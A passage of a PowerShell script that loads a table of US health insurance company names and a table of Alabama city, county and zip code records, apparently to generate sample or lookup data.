$InsuranceCompanies.Rows.Add("Community First Health Plans") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc.") + $null = $InsuranceCompanies.Rows.Add("Valley Baptist Health Plans, dba of VBIC") + $null = $InsuranceCompanies.Rows.Add("Allegian Health Plans") + $null = $InsuranceCompanies.Rows.Add("Valley Baptist Insurance Company dba Valley Baptist Health Plans") + $null = $InsuranceCompanies.Rows.Add("Allegian Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Sendero Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Cigna HealthCare of Texas, Inc.") + $null = $InsuranceCompanies.Rows.Add("Vista Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Superior Health Plan") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Utah, Inc.") + $null = $InsuranceCompanies.Rows.Add("Regence BlueCross BlueShield of Utah") + $null = $InsuranceCompanies.Rows.Add("Arches Mutual Insurance Company") + $null = $InsuranceCompanies.Rows.Add("BridgeSpan Health Utah") + $null = $InsuranceCompanies.Rows.Add("University of Utah Health Insurance Plans") + $null = $InsuranceCompanies.Rows.Add("University of Utah Health Inurance Plans") + $null = $InsuranceCompanies.Rows.Add("Humana Medical Plan of Utah") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Utah, Inc.") + $null = $InsuranceCompanies.Rows.Add("HSA Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("BlueChoice Inc.") + $null = $InsuranceCompanies.Rows.Add("Innovation Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Piedmont Community HealthCare, Inc.") + $null = $InsuranceCompanies.Rows.Add("Piedmont Community Health Care") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans of VA") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans of VA, Inc.") + $null = $InsuranceCompanies.Rows.Add("Optima Health Plan") + $null = $InsuranceCompanies.Rows.Add("Optum Choice, Inc.") + $null = $InsuranceCompanies.Rows.Add("Piedmont Community HealthCare HMO, Inc.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of the Mid-Atlantic, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Mid Atlantic, Inc.") + $null = $InsuranceCompanies.Rows.Add("Group Medical and Hospitalizaiton Services, Inc") + $null = $InsuranceCompanies.Rows.Add("Innovation Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthKeepers, Inc.") + $null = $InsuranceCompanies.Rows.Add("Optima Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Coventry Health and Life Insurance Co., Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Virginia, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Virginia, Inc") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Virginia, Inc") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Vermont") + $null = $InsuranceCompanies.Rows.Add("The Vermont Health Plan") + $null = $InsuranceCompanies.Rows.Add("Community Health Plan of Washington") + $null = $InsuranceCompanies.Rows.Add("Northwest") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of Washington") + $null = $InsuranceCompanies.Rows.Add("Group Health Options, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Alliance Northwest") + $null = $InsuranceCompanies.Rows.Add("Health Aliance Northwest Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("LifeWise Health Plan of Washington") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Washington, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Washington, Inc") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Washington Inc.") + $null = $InsuranceCompanies.Rows.Add("UHC of Washington") + $null = $InsuranceCompanies.Rows.Add("Premera Blue Cross") + $null = $InsuranceCompanies.Rows.Add("Premera Blue Cross of Washington") + $null = $InsuranceCompanies.Rows.Add("BridgeSpan Health Washington") + $null = $InsuranceCompanies.Rows.Add("Columbia United Providers, Inc.") + $null = $InsuranceCompanies.Rows.Add("Columbia United Providers Inc.") + $null = $InsuranceCompanies.Rows.Add("Moda Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Asuris Northwest Health") + $null = $InsuranceCompanies.Rows.Add("Regence BlueCross BlueShield of Oregon (Clark County)") + $null = $InsuranceCompanies.Rows.Add("Group Health Cooperative") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Washington, Inc") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Washington, Inc.") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Washington Inc.") + $null = $InsuranceCompanies.Rows.Add("Regence Blueshield") + $null = $InsuranceCompanies.Rows.Add("Regence BlueShield") + $null = $InsuranceCompanies.Rows.Add("Children's Community Health Plan") + $null = $InsuranceCompanies.Rows.Add("Group Health Cooperative of Eau Claire") + $null = $InsuranceCompanies.Rows.Add("HealthPartners") + $null = $InsuranceCompanies.Rows.Add("U S Health and Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Managed Health Services Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("MercyCare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Unity Health Plans Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Unity Health Insurance Plans Corporation") + $null = $InsuranceCompanies.Rows.Add("Untiy Health Plans Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Unity") + $null = $InsuranceCompanies.Rows.Add("Security Health Plan") + $null = $InsuranceCompanies.Rows.Add("Security Health Plan of Wisconsin, Inc.") + $null = $InsuranceCompanies.Rows.Add("Dean Health Plan") + $null = $InsuranceCompanies.Rows.Add("Health Tradition Health Plan") + $null = $InsuranceCompanies.Rows.Add("Health Traditions Health Plan") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Wisconsin, Inc") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Wisconsin") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Wisconsin, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Wisconsin Health Organization Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Medica Health Plans of Wisconsin - WI") + $null = $InsuranceCompanies.Rows.Add("MercyCare HMO, Inc.") + $null = $InsuranceCompanies.Rows.Add("MercyCare HMO, Inc") + $null = $InsuranceCompanies.Rows.Add("Physicians Plus Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Medical Associates Clinic Health Plan of Wisconsin") + $null = $InsuranceCompanies.Rows.Add("Compcare Health Services Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Compcare Health Services Insurance Corporation (HMO/POS-in network)") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE OF WISCONSIN INC") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Wisconsin, Inc.") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE OF WISCONSIN INC.") + $null = $InsuranceCompanies.Rows.Add("Network Health Plan") + $null = $InsuranceCompanies.Rows.Add("Network Health") + $null = $InsuranceCompanies.Rows.Add("Wisconsin Physicians Servive Inc") + $null = $InsuranceCompanies.Rows.Add("Wisconsin Physicians Service Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Wisconsin Physicians Service Inc") + $null = $InsuranceCompanies.Rows.Add("WPS Health Plan, Inc") + $null = $InsuranceCompanies.Rows.Add("WPS Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Aspirus Arise Health Plan of Wisconsin, Inc.") + $null = $InsuranceCompanies.Rows.Add("Common Ground Healthcare Cooperative") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Wisconsin (PPO and out of network POS)") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Wisconsin") + $null = $InsuranceCompanies.Rows.Add("Group Health Cooperative of South Central Wisconsin") + $null = $InsuranceCompanies.Rows.Add("Group Health of Cooperative- SCW") + $null = $InsuranceCompanies.Rows.Add("Group Health Cooperative- SCW") + $null = $InsuranceCompanies.Rows.Add("West Virginia Health Cooperative") + $null = $InsuranceCompanies.Rows.Add("Highmark West Virginia, Inc.") + $null = $InsuranceCompanies.Rows.Add("Highmark Blue Cross Blue Shield WV") + $null = $InsuranceCompanies.Rows.Add("Highmark BCBSWV, Inc.") + $null = $InsuranceCompanies.Rows.Add("Highmark WV") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of West Virginia, Inc.") + $null = $InsuranceCompanies.Rows.Add("CareSource West Virginia Co.") + $null = $InsuranceCompanies.Rows.Add("UniterHealthcare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Optimum Choice Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Wyoming") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield Wyoming") + $null = $InsuranceCompanies.Rows.Add("Winhealth Partners Inc") + $null = $InsuranceCompanies.Rows.Add("WINhealth Partners") + $null = $InsuranceCompanies.Rows.Add("WINhealth Partners Inc") + + # Define list of State, City, Zip Code + # https://github.com/scpike/us-state-county-zip/blob/master/geo-data.csv + $Cities = New-Object System.Data.DataTable + $null = $Cities.Columns.Add("city") + $null = $Cities.Columns.Add("county") + $null = $Cities.Columns.Add("state") + $null = $Cities.Columns.Add("state_abbr") + $null = $Cities.Columns.Add("state_fips") + $null = $Cities.Columns.Add("zipcode") + $null = $Cities.Rows.Add("Acmar","St. Clair","Alabama","AL","1","35004") + $null = $Cities.Rows.Add("Adamsville","Jefferson","Alabama","AL","1","35005") + $null = $Cities.Rows.Add("Adger","Jefferson","Alabama","AL","1","35006") + $null = $Cities.Rows.Add("Keystone","Shelby","Alabama","AL","1","35007") + $null = $Cities.Rows.Add("New site","Tallapoosa","Alabama","AL","1","35010") + $null = $Cities.Rows.Add("Alpine","Talladega","Alabama","AL","1","35014") + $null = $Cities.Rows.Add("Arab","Marshall","Alabama","AL","1","35016") + $null = $Cities.Rows.Add("Baileyton","Cullman","Alabama","AL","1","35019") + $null = $Cities.Rows.Add("Bessemer","Jefferson","Alabama","AL","1","35020") + $null = $Cities.Rows.Add("Zcta 35022","Jefferson","Alabama","AL","1","35022") + $null = $Cities.Rows.Add("Hueytown","Jefferson","Alabama","AL","1","35023") + $null = $Cities.Rows.Add("Blountsville","Blount","Alabama","AL","1","35031") + $null = $Cities.Rows.Add("Bremen","Cullman","Alabama","AL","1","35033") + $null = $Cities.Rows.Add("Brent","Bibb","Alabama","AL","1","35034") + $null = $Cities.Rows.Add("Brierfield","Bibb","Alabama","AL","1","35035") + $null = $Cities.Rows.Add("Brookside","Jefferson","Alabama","AL","1","35036") + $null = $Cities.Rows.Add("Calera","Shelby","Alabama","AL","1","35040") + $null = $Cities.Rows.Add("Centreville","Bibb","Alabama","AL","1","35042") + $null = $Cities.Rows.Add("Chelsea","Shelby","Alabama","AL","1","35043") + $null = $Cities.Rows.Add("Coosa pines","Talladega","Alabama","AL","1","35044") + $null = $Cities.Rows.Add("Clanton","Chilton","Alabama","AL","1","35045") + $null = $Cities.Rows.Add("Zcta 35046","Chilton","Alabama","AL","1","35046") + $null = $Cities.Rows.Add("Cleveland","Blount","Alabama","AL","1","35049") + $null = $Cities.Rows.Add("Columbiana","Shelby","Alabama","AL","1","35051") + $null = $Cities.Rows.Add("Cook springs","St. Clair","Alabama","AL","1","35052") + $null = $Cities.Rows.Add("Crane hill","Cullman","Alabama","AL","1","35053") + $null = $Cities.Rows.Add("Cropwell","St. Clair","Alabama","AL","1","35054") + $null = $Cities.Rows.Add("Cullman","Cullman","Alabama","AL","1","35055") + $null = $Cities.Rows.Add("Cullman","Cullman","Alabama","AL","1","35057") + $null = $Cities.Rows.Add("Zcta 35058","Cullman","Alabama","AL","1","35058") + $null = $Cities.Rows.Add("Docena","Jefferson","Alabama","AL","1","35060") + $null = $Cities.Rows.Add("Dolomite","Jefferson","Alabama","AL","1","35061") + $null = $Cities.Rows.Add("Dora","Jefferson","Alabama","AL","1","35062") + $null = $Cities.Rows.Add("Empire","Walker","Alabama","AL","1","35063") + $null = $Cities.Rows.Add("Fairfield","Jefferson","Alabama","AL","1","35064") + $null = $Cities.Rows.Add("Coalburg","Jefferson","Alabama","AL","1","35068") + $null = $Cities.Rows.Add("Garden city","Cullman","Alabama","AL","1","35070") + $null = $Cities.Rows.Add("Gardendale","Jefferson","Alabama","AL","1","35071") + $null = $Cities.Rows.Add("Goodwater","Coosa","Alabama","AL","1","35072") + $null = $Cities.Rows.Add("Alden","Jefferson","Alabama","AL","1","35073") + $null = $Cities.Rows.Add("Green pond","Bibb","Alabama","AL","1","35074") + $null = $Cities.Rows.Add("Hanceville","Cullman","Alabama","AL","1","35077") + $null = $Cities.Rows.Add("Harpersville","Shelby","Alabama","AL","1","35078") + $null = $Cities.Rows.Add("Hayden","Blount","Alabama","AL","1","35079") + $null = $Cities.Rows.Add("Helena","Shelby","Alabama","AL","1","35080") + $null = $Cities.Rows.Add("Hollins","Clay","Alabama","AL","1","35082") + $null = $Cities.Rows.Add("Holly pond","Cullman","Alabama","AL","1","35083") + $null = $Cities.Rows.Add("Jemison","Chilton","Alabama","AL","1","35085") + $null = $Cities.Rows.Add("Joppa","Cullman","Alabama","AL","1","35087") + $null = $Cities.Rows.Add("Kellyton","Coosa","Alabama","AL","1","35089") + $null = $Cities.Rows.Add("Kimberly","Jefferson","Alabama","AL","1","35091") + $null = $Cities.Rows.Add("Leeds","Jefferson","Alabama","AL","1","35094") + $null = $Cities.Rows.Add("Lincoln","Talladega","Alabama","AL","1","35096") + $null = $Cities.Rows.Add("Locust fork","Blount","Alabama","AL","1","35097") + $null = $Cities.Rows.Add("Logan","Cullman","Alabama","AL","1","35098") + $null = $Cities.Rows.Add("Zcta 350hh","Chilton","Alabama","AL","1","350HH") + $null = $Cities.Rows.Add("Zcta 350xx","Coosa","Alabama","AL","1","350XX") + $null = $Cities.Rows.Add("Mc calla","Tuscaloosa","Alabama","AL","1","35111") + $null = $Cities.Rows.Add("Margaret","St. Clair","Alabama","AL","1","35112") + $null = $Cities.Rows.Add("Maylene","Shelby","Alabama","AL","1","35114") + $null = $Cities.Rows.Add("Montevallo","Shelby","Alabama","AL","1","35115") + $null = $Cities.Rows.Add("Morris","Jefferson","Alabama","AL","1","35116") + $null = $Cities.Rows.Add("Mount olive","Jefferson","Alabama","AL","1","35117") + $null = $Cities.Rows.Add("Sylvan springs","Jefferson","Alabama","AL","1","35118") + $null = $Cities.Rows.Add("New castle","Jefferson","Alabama","AL","1","35119") + $null = $Cities.Rows.Add("Odenville","St. Clair","Alabama","AL","1","35120") + $null = $Cities.Rows.Add("Oneonta","Blount","Alabama","AL","1","35121") + $null = $Cities.Rows.Add("Indian springs","Shelby","Alabama","AL","1","35124") + $null = $Cities.Rows.Add("Pell city","St. Clair","Alabama","AL","1","35125") + $null = $Cities.Rows.Add("Dixiana","Jefferson","Alabama","AL","1","35126") + $null = $Cities.Rows.Add("Pleasant grove","Jefferson","Alabama","AL","1","35127") + $null = $Cities.Rows.Add("Zcta 35128","St. Clair","Alabama","AL","1","35128") + $null = $Cities.Rows.Add("Quinton","Walker","Alabama","AL","1","35130") + $null = $Cities.Rows.Add("Ragland","St. Clair","Alabama","AL","1","35131") + $null = $Cities.Rows.Add("Remlap","Blount","Alabama","AL","1","35133") + $null = $Cities.Rows.Add("Riverside","St. Clair","Alabama","AL","1","35135") + $null = $Cities.Rows.Add("Rockford","Coosa","Alabama","AL","1","35136") + $null = $Cities.Rows.Add("Sayre","Jefferson","Alabama","AL","1","35139") + $null = $Cities.Rows.Add("Shelby","Shelby","Alabama","AL","1","35143") + $null = $Cities.Rows.Add("Springville","St. Clair","Alabama","AL","1","35146") + $null = $Cities.Rows.Add("Sterrett","Shelby","Alabama","AL","1","35147") + $null = $Cities.Rows.Add("Sumiton","Walker","Alabama","AL","1","35148") + $null = $Cities.Rows.Add("Sycamore","Talladega","Alabama","AL","1","35149") + $null = $Cities.Rows.Add("Sylacauga","Talladega","Alabama","AL","1","35150") + $null = $Cities.Rows.Add("Zcta 35151","Talladega","Alabama","AL","1","35151") + $null = $Cities.Rows.Add("Talladega","Talladega","Alabama","AL","1","35160") + $null = $Cities.Rows.Add("Thorsby","Chilton","Alabama","AL","1","35171") + $null = $Cities.Rows.Add("Trafford","Blount","Alabama","AL","1","35172") + $null = $Cities.Rows.Add("Trussville","Jefferson","Alabama","AL","1","35173") + $null = $Cities.Rows.Add("Union grove","Marshall","Alabama","AL","1","35175") + $null = $Cities.Rows.Add("Vandiver","Shelby","Alabama","AL","1","35176") + $null = $Cities.Rows.Add("Vincent","Shelby","Alabama","AL","1","35178") + $null = $Cities.Rows.Add("Vinemont","Cullman","Alabama","AL","1","35179") + $null = $Cities.Rows.Add("Warrior","Jefferson","Alabama","AL","1","35180") + $null = $Cities.Rows.Add("Weogufka","Coosa","Alabama","AL","1","35183") + $null = $Cities.Rows.Add("West blocton","Bibb","Alabama","AL","1","35184") + $null = $Cities.Rows.Add("Wilsonville","Shelby","Alabama","AL","1","35186") + $null = $Cities.Rows.Add("Woodstock","Bibb","Alabama","AL","1","35188") + $null = $Cities.Rows.Add("Zcta 351hh","Blount","Alabama","AL","1","351HH") + $null = $Cities.Rows.Add("Zcta 351xx","Coosa","Alabama","AL","1","351XX") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35203") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35204") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35205") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35206") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35207") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35208") + $null = $Cities.Rows.Add("Homewood","Jefferson","Alabama","AL","1","35209") + $null = $Cities.Rows.Add("Irondale","Jefferson","Alabama","AL","1","35210") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35211") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35212") + $null = $Cities.Rows.Add("Crestline height","Jefferson","Alabama","AL","1","35213") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35214") + $null = $Cities.Rows.Add("Center point","Jefferson","Alabama","AL","1","35215") + $null = $Cities.Rows.Add("Vestavia hills","Jefferson","Alabama","AL","1","35216") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35217") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35218") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35221") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35222") + $null = $Cities.Rows.Add("Mountain brook","Jefferson","Alabama","AL","1","35223") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35224") + $null = $Cities.Rows.Add("Bluff park","Jefferson","Alabama","AL","1","35226") + $null = $Cities.Rows.Add("Midfield","Jefferson","Alabama","AL","1","35228") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35233") + $null = $Cities.Rows.Add("Birmingham","Jefferson","Alabama","AL","1","35234") + $null = $Cities.Rows.Add("Center point","Jefferson","Alabama","AL","1","35235") + $null = $Cities.Rows.Add("Shoal creek","Shelby","Alabama","AL","1","35242") + $null = $Cities.Rows.Add("Cahaba heights","Jefferson","Alabama","AL","1","35243") + $null = $Cities.Rows.Add("Hoover","Jefferson","Alabama","AL","1","35244") + $null = $Cities.Rows.Add("Zcta 352hh","Jefferson","Alabama","AL","1","352HH") + $null = $Cities.Rows.Add("Tuscaloosa","Tuscaloosa","Alabama","AL","1","35401") + $null = $Cities.Rows.Add("Tuscaloosa","Tuscaloosa","Alabama","AL","1","35403") + $null = $Cities.Rows.Add("Holt","Tuscaloosa","Alabama","AL","1","35404") + $null = $Cities.Rows.Add("Tuscaloosa","Tuscaloosa","Alabama","AL","1","35405") + $null = $Cities.Rows.Add("Tuscaloosa","Tuscaloosa","Alabama","AL","1","35406") + $null = $Cities.Rows.Add("Stewart","Hale","Alabama","AL","1","35441") + $null = $Cities.Rows.Add("Aliceville","Pickens","Alabama","AL","1","35442") + $null = $Cities.Rows.Add("Boligee","Greene","Alabama","AL","1","35443") + $null = $Cities.Rows.Add("Brookwood","Tuscaloosa","Alabama","AL","1","35444") + $null = $Cities.Rows.Add("Buhl","Tuscaloosa","Alabama","AL","1","35446") + $null = $Cities.Rows.Add("Carrollton","Pickens","Alabama","AL","1","35447") + $null = $Cities.Rows.Add("Coker","Tuscaloosa","Alabama","AL","1","35452") + $null = $Cities.Rows.Add("Cottondale","Tuscaloosa","Alabama","AL","1","35453") + $null = $Cities.Rows.Add("Duncanville","Tuscaloosa","Alabama","AL","1","35456") + $null = $Cities.Rows.Add("Echola","Tuscaloosa","Alabama","AL","1","35457") + $null = $Cities.Rows.Add("Elrod","Tuscaloosa","Alabama","AL","1","35458") + $null = $Cities.Rows.Add("Emelle","Sumter","Alabama","AL","1","35459") + $null = $Cities.Rows.Add("Epes","Sumter","Alabama","AL","1","35460") + $null = $Cities.Rows.Add("Ethelsville","Pickens","Alabama","AL","1","35461") + $null = $Cities.Rows.Add("Eutaw","Greene","Alabama","AL","1","35462") + $null = $Cities.Rows.Add("Fosters","Tuscaloosa","Alabama","AL","1","35463") + $null = $Cities.Rows.Add("Gainesville","Sumter","Alabama","AL","1","35464") + $null = $Cities.Rows.Add("Gordo","Pickens","Alabama","AL","1","35466") + $null = $Cities.Rows.Add("Knoxville","Greene","Alabama","AL","1","35469") + $null = $Cities.Rows.Add("Coatopa","Sumter","Alabama","AL","1","35470") + $null = $Cities.Rows.Add("Mc shan","Pickens","Alabama","AL","1","35471") + $null = $Cities.Rows.Add("Zcta 35473","Tuscaloosa","Alabama","AL","1","35473") + $null = $Cities.Rows.Add("Cypress","Hale","Alabama","AL","1","35474") + $null = $Cities.Rows.Add("Zcta 35475","Tuscaloosa","Alabama","AL","1","35475") + $null = $Cities.Rows.Add("Northport","Tuscaloosa","Alabama","AL","1","35476") + $null = $Cities.Rows.Add("Panola","Sumter","Alabama","AL","1","35477") + $null = $Cities.Rows.Add("Ralph","Tuscaloosa","Alabama","AL","1","35480") + $null = $Cities.Rows.Add("Reform","Pickens","Alabama","AL","1","35481") + $null = $Cities.Rows.Add("Vance","Tuscaloosa","Alabama","AL","1","35490") + $null = $Cities.Rows.Add("Zcta 354hh","Greene","Alabama","AL","1","354HH") + $null = $Cities.Rows.Add("Zcta 354xx","Sumter","Alabama","AL","1","354XX") + $null = $Cities.Rows.Add("Jasper","Walker","Alabama","AL","1","35501") + $null = $Cities.Rows.Add("Zcta 35503","Walker","Alabama","AL","1","35503") + $null = $Cities.Rows.Add("Zcta 35504","Walker","Alabama","AL","1","35504") + $null = $Cities.Rows.Add("Addison","Winston","Alabama","AL","1","35540") + $null = $Cities.Rows.Add("Arley","Winston","Alabama","AL","1","35541") + $null = $Cities.Rows.Add("Bankston","Fayette","Alabama","AL","1","35542") + $null = $Cities.Rows.Add("Bear creek","Marion","Alabama","AL","1","35543") + $null = $Cities.Rows.Add("Beaverton","Lamar","Alabama","AL","1","35544") + $null = $Cities.Rows.Add("Belk","Fayette","Alabama","AL","1","35545") + $null = $Cities.Rows.Add("Berry","Fayette","Alabama","AL","1","35546") + $null = $Cities.Rows.Add("Brilliant","Marion","Alabama","AL","1","35548") + $null = $Cities.Rows.Add("Carbon hill","Walker","Alabama","AL","1","35549") + $null = $Cities.Rows.Add("Cordova","Walker","Alabama","AL","1","35550") + $null = $Cities.Rows.Add("Detroit","Lamar","Alabama","AL","1","35552") + $null = $Cities.Rows.Add("Double springs","Winston","Alabama","AL","1","35553") + $null = $Cities.Rows.Add("Eldridge","Fayette","Alabama","AL","1","35554") + $null = $Cities.Rows.Add("Fayette","Fayette","Alabama","AL","1","35555") + $null = $Cities.Rows.Add("Glen allen","Fayette","Alabama","AL","1","35559") + $null = $Cities.Rows.Add("Guin","Marion","Alabama","AL","1","35563") + $null = $Cities.Rows.Add("Hackleburg","Marion","Alabama","AL","1","35564") + $null = $Cities.Rows.Add("Haleyville","Winston","Alabama","AL","1","35565") + $null = $Cities.Rows.Add("Hamilton","Marion","Alabama","AL","1","35570") + $null = $Cities.Rows.Add("Hodges","Franklin","Alabama","AL","1","35571") + $null = $Cities.Rows.Add("Houston","Winston","Alabama","AL","1","35572") + $null = $Cities.Rows.Add("Kennedy","Lamar","Alabama","AL","1","35574") + $null = $Cities.Rows.Add("Lynn","Winston","Alabama","AL","1","35575") + $null = $Cities.Rows.Add("Millport","Lamar","Alabama","AL","1","35576") + $null = $Cities.Rows.Add("Nauvoo","Walker","Alabama","AL","1","35578") + $null = $Cities.Rows.Add("Oakman","Walker","Alabama","AL","1","35579") + $null = $Cities.Rows.Add("Parrish","Walker","Alabama","AL","1","35580") + $null = $Cities.Rows.Add("Phil campbell","Franklin","Alabama","AL","1","35581") + $null = $Cities.Rows.Add("Red bay","Franklin","Alabama","AL","1","35582") + $null = $Cities.Rows.Add("Sipsey","Walker","Alabama","AL","1","35584") + $null = $Cities.Rows.Add("Spruce pine","Franklin","Alabama","AL","1","35585") + $null = $Cities.Rows.Add("Sulligent","Lamar","Alabama","AL","1","35586") + $null = $Cities.Rows.Add("Townley","Walker","Alabama","AL","1","35587") + $null = $Cities.Rows.Add("Vernon","Lamar","Alabama","AL","1","35592") + $null = $Cities.Rows.Add("Vina","Franklin","Alabama","AL","1","35593") + $null = $Cities.Rows.Add("Winfield","Marion","Alabama","AL","1","35594") + $null = $Cities.Rows.Add("Zcta 355hh","Franklin","Alabama","AL","1","355HH") + $null = $Cities.Rows.Add("Zcta 355xx","Lawrence","Alabama","AL","1","355XX") + $null = $Cities.Rows.Add("Decatur","Morgan","Alabama","AL","1","35601") + $null = $Cities.Rows.Add("Decatur","Morgan","Alabama","AL","1","35603") + $null = $Cities.Rows.Add("Anderson","Lauderdale","Alabama","AL","1","35610") + $null = $Cities.Rows.Add("Athens","Limestone","Alabama","AL","1","35611") + $null = $Cities.Rows.Add("Zcta 35613","Limestone","Alabama","AL","1","35613") + $null = $Cities.Rows.Add("Zcta 35614","Limestone","Alabama","AL","1","35614") + $null = $Cities.Rows.Add("Cherokee","Colbert","Alabama","AL","1","35616") + $null = $Cities.Rows.Add("Courtland","Lawrence","Alabama","AL","1","35618") + $null = $Cities.Rows.Add("Danville","Morgan","Alabama","AL","1","35619") + $null = $Cities.Rows.Add("Elkmont","Limestone","Alabama","AL","1","35620") + $null = $Cities.Rows.Add("Eva","Morgan","Alabama","AL","1","35621") + $null = $Cities.Rows.Add("Falkville","Morgan","Alabama","AL","1","35622") + $null = $Cities.Rows.Add("Florence","Lauderdale","Alabama","AL","1","35630") + $null = $Cities.Rows.Add("Florence","Lauderdale","Alabama","AL","1","35633") + $null = $Cities.Rows.Add("Zcta 35634","Lauderdale","Alabama","AL","1","35634") + $null = $Cities.Rows.Add("Hartselle","Morgan","Alabama","AL","1","35640") + $null = $Cities.Rows.Add("Hillsboro","Lawrence","Alabama","AL","1","35643") + $null = $Cities.Rows.Add("Killen","Lauderdale","Alabama","AL","1","35645") + $null = $Cities.Rows.Add("Leighton","Colbert","Alabama","AL","1","35646") + $null = $Cities.Rows.Add("Lester","Limestone","Alabama","AL","1","35647") + $null = $Cities.Rows.Add("Lexington","Lauderdale","Alabama","AL","1","35648") + $null = $Cities.Rows.Add("Mooresville","Limestone","Alabama","AL","1","35649") + $null = $Cities.Rows.Add("Moulton","Lawrence","Alabama","AL","1","35650") + $null = $Cities.Rows.Add("Mount hope","Lawrence","Alabama","AL","1","35651") + $null = $Cities.Rows.Add("Rogersville","Lauderdale","Alabama","AL","1","35652") + $null = $Cities.Rows.Add("Russellville","Franklin","Alabama","AL","1","35653") + $null = $Cities.Rows.Add("Zcta 35654","Franklin","Alabama","AL","1","35654") + $null = $Cities.Rows.Add("Sheffield","Colbert","Alabama","AL","1","35660") + $null = $Cities.Rows.Add("Muscle shoals","Colbert","Alabama","AL","1","35661") + $null = $Cities.Rows.Add("Somerville","Morgan","Alabama","AL","1","35670") + $null = $Cities.Rows.Add("Tanner","Limestone","Alabama","AL","1","35671") + $null = $Cities.Rows.Add("Town creek","Lawrence","Alabama","AL","1","35672") + $null = $Cities.Rows.Add("Trinity","Lawrence","Alabama","AL","1","35673") + $null = $Cities.Rows.Add("Tuscumbia","Colbert","Alabama","AL","1","35674") + $null = $Cities.Rows.Add("Waterloo","Lauderdale","Alabama","AL","1","35677") + $null = $Cities.Rows.Add("Zcta 356hh","Colbert","Alabama","AL","1","356HH") + $null = $Cities.Rows.Add("Zcta 356xx","Lawrence","Alabama","AL","1","356XX") + $null = $Cities.Rows.Add("Ardmore","Limestone","Alabama","AL","1","35739") + $null = $Cities.Rows.Add("Bridgeport","Jackson","Alabama","AL","1","35740") + $null = $Cities.Rows.Add("Brownsboro","Madison","Alabama","AL","1","35741") + $null = $Cities.Rows.Add("Capshaw","Limestone","Alabama","AL","1","35742") + $null = $Cities.Rows.Add("Dutton","Jackson","Alabama","AL","1","35744") + $null = $Cities.Rows.Add("Estillfork","Jackson","Alabama","AL","1","35745") + $null = $Cities.Rows.Add("Fackler","Jackson","Alabama","AL","1","35746") + $null = $Cities.Rows.Add("Grant","Marshall","Alabama","AL","1","35747") + $null = $Cities.Rows.Add("Gurley","Madison","Alabama","AL","1","35748") + $null = $Cities.Rows.Add("Harvest","Madison","Alabama","AL","1","35749") + $null = $Cities.Rows.Add("Hazel green","Madison","Alabama","AL","1","35750") + $null = 